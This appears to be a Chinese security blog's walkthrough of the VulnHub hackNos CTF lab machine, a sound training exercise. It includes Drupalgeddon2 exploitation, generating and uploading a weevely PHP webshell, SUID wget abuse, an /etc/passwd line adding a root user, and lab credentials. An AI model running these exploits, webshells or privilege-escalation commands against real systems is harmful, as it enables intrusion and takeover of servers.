本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
大余安全
大家好,这里是 大余安全 的第 52 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
靶机难度:中级(CTF)-- 本人做完觉得是初级!!
靶机发布日期:2019 年 11 月 27 日
靶机描述:
Difficulty : Easy to Intermediate
Flag : 2 Flag first user And second root
Learning : exploit | Web Application | Enumeration | Privilege Escalation
Website : www.hackNos.com
mail : [email protected]
请注意:对于所有这些计算机,我已经使用 VMware 运行下载的计算机。我将使用 Kali Linux 作为解决该 CTF 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
我们在 VM 中需要确定攻击目标的 IP 地址,需要使用 nmap 获取目标 IP 地址:
我们已经找到了此次 CTF 目标计算机 IP 地址:192.168.56.143
nmap 发现开放了 22、80 端口...
80 是个 apache2... 爆破看看...
发现 drupal...
这边利用 Droopescan 进行扫描(Droopescan 是一款基于插件的扫描器,可帮助安全研究人员发现 Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用 URL 地址)和 Moodle 的问题)
这边当然也可以用 dirb,dirbuster 等等,Droopescan 比较好针对 drupal...安装连接
二、提权
方法 1:
drupal7.57 的版本...
两种方法:一种直接利用 MSF,一种利用 python 脚本...
MSF 内核直接拿到 shell...
方法 2:
git clone https://github.com/dreadlocked/Drupalgeddon2.git
先在 github 上下载该 exp... 如果执行和我一样报错,需要下载 `
gem install highline` 因为在运行该 exp 前,需要预装依赖包 highline... 看下图
成功获得 www-data 权限,但是这里想获得 TTY 必须利用木马工具...
weevely generate cmd ./xiaoma.php
生成木马... 然后上传上去即可...
weevely http://192.168.56.143/drupal/xiaoma.php cmd
成功...
方法 3:
直接在链接下载 py,利用 python3 即可提权...
https://www.exploit-db.com/exploits/44448
python3 -c 'import pty; pty.spawn("/bin/bash")'
获得 TTY... 不演示了...
成功获得 user...
在 html 页面目录发现了 alexander.txt...
一看就知道 base64 编码,解码...
这是 brainfuck 加密后的字符串... 解码...
[解码链接](https://www.splitbrain.org/services/ook)
james:Hacker@4514
我尝试在数据库看看能不能也找到密码... 试试
发现数据库用户密码:
cuppauser、Akrn@4514
这儿也能看到,但是无法解析... 跳过
find / -perm -u=s -type f 2>/dev/null
这里可以 wget 和 sudo,但是 sudo -l 需要密码... 这里直接利用 wget 替换本地的 passwd 即可提权 root... 试试
openssl passwd -1 -salt dayu dayu
echo 'dayu:$1$dayu$/Cg/PH1Ew3w37.fLDfjX8/:0:0:root:/root:/bin/bash' >> /etc/passwd
在本地生成 root 权限用户 dayu... 开启本地服务
成功获得 root 权限并查看两个 flag...
当然方法很多种,千变万化,理解原理即可!!!加油!!!
由于我们已经成功得到 root 权限查看 flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
大余安全
一个全栈渗透小技巧的公众号